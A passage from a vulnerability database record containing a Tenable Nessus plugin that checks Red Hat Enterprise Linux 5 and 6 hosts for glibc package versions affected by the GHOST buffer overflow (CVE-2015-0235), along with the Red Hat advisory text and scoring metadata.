(isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-debuginfo-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-devel-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-devel-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-devel-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-static-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-static-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "title": "RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)", "type": "nessus", "viewCount": 2}, "differentElements": ["modified", "sourceData"], "edition": 3, "lastseen": "2017-10-29T13:40:47"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc-static", "cpe:/o:redhat:enterprise_linux:6.5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "cpe:/o:redhat:enterprise_linux:5.9", "p-cpe:/a:redhat:enterprise_linux:glibc", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "cvelist": ["CVE-2015-0235"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "edition": 10, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "fbd14dc5e84ec1b13df51c1e2718b61ebebf385fcf043ea3cc26345ca081c5ce", "hashmap": [{"hash": "5a30b331c491a149b274795dcb31aa8e", "key": "description"}, {"hash": "841f459c9764bcdcd6d5a1955f15a6d5", "key": "cvelist"}, {"hash": "9d330cf761b59ad977d4969a9adbbd24", "key": "title"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "3d8d634cf2d0899c0d90aff4e213fae6", "key": "published"}, {"hash": "d724cd7c7bdb670117d239f0719c8bcd", "key": "references"}, {"hash": "d459846fc4189fab17e65d683fe5fd76", "key": "cpe"}, {"hash": "813366c4a714f890ad158fca7c40bbaf", "key": "pluginID"}, {"hash": "f71a9310b57e3fbd55f27df0487eecda", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "341a141f8365cdd9e626c9fa294e819c", "key": "href"}, {"hash": "4be6681e924fd88f11db24aba9bb65e2", "key": "sourceData"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=81068", "id": "REDHAT-RHSA-2015-0099.NASL", "lastseen": "2018-12-15T03:59:03", "modified": "2018-12-14T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "81068", "published": "2015-01-29T00:00:00", "references": ["https://access.redhat.com/errata/RHSA-2015:0099", "https://access.redhat.com/security/cve/cve-2015-0235"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0099. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81068);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/12/14 9:50:14\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"RHSA\", value:\"2015:0099\");\n\n script_name(english:\"RHEL 6 : glibc (RHSA-2015:0099) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux\n5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced\nUpdate Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended\nUpdate Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0099\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5\\.6|5\\.9|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.6 / 5.9 / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0099\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-devel-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-devel-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-static-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-static-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) 